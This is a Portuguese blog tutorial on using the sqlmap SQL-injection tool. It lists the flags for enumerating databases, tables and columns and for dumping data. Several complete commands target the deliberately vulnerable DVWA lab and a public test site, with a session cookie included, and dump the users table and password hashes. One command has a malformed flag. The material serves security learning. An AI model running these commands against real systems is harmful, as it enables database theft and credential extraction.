Pesquisar este blog

segunda-feira, 12 de dezembro de 2011

Usando o SQLMAP na aplicação DVWA de Teste


Sqlmap é uma ferramenta open source para penetration test que automatiza o processo de detecção e exploiting de vulnerabilidades a Sqli Injection, é escrita em python e tem suporte tanto GNU linux ou windows.” O sqlmap além de oferecer as funções para detectar e explorar as vulnerabilidades a SQLI, ele consegue também tentar “dominar” o sistema de banco de dados se for possivel.


Comandos Principais do SQLMAP
Identificar banco:
./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" -b
Bases:
--current-db -> mostra a atual
--dbs -> lista as bases
Tabelas:
-D [banco]
--tables -> lista as tabelas
Colunas:
-D [banco]
-T [tabela]
--columns -> lista as colunas
Valores:
-D [banco]
-T [tabel]
-C [coluna]
--dump -> extrai os valores

EXEMPLO UTILIZANDO A APLICAÇÃO DVWA PARA TESTE DE SEGURANÇA.

> Primeiro deve-se pegar a URL do sistema, aonde deseja fazer a injeção, segundo pega os dados do PHPSESSID

--> Verifica a Versão do Banco
python sqlmap.py -u 'http://192.168.12.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie 'PHPSESSID=vug5ogmej1lmsd1unlqmd2fmu1; security=low' --string='Surname' --dbs

--> Verifica a tabela users
python sqlmap.py -u 'http://192.168.12.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie 'PHPSESSID=vug5ogmej1lmsd1unlqmd2fmu1; security=low' --string='Surname' -T users --columns

---------------------------------------------- descriptografa os dados da tabela users ----

python sqlmap.py -u 'http://192.168.12.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie 'PHPSESSID=vug5ogmej1lmsd1unlqmd2fmu1; security=low' --string='Surname' --dump ---users

python sqlmap.py -u 'http://192.168.12.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie 'PHPSESSID=vug5ogmej1lmsd1unlqmd2fmu1; security=low' --string='Surname' --passwords -v 1

python sqlmap.py -u 'http://192.168.12.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie 'PHPSESSID=vug5ogmej1lmsd1unlqmd2fmu1; security=low' --string='Surname' --columns \
-D testdb -T users -C name

http://www.4shared.com/document/A6uqCxmO/SQLmapManual.html

  • Videos no Youtube

 http://www.youtube.com/watch?v=4qO8kOeU54o
 http://www.youtube.com/watch?v=hvjN3p207rw

Nenhum comentário:

Postar um comentário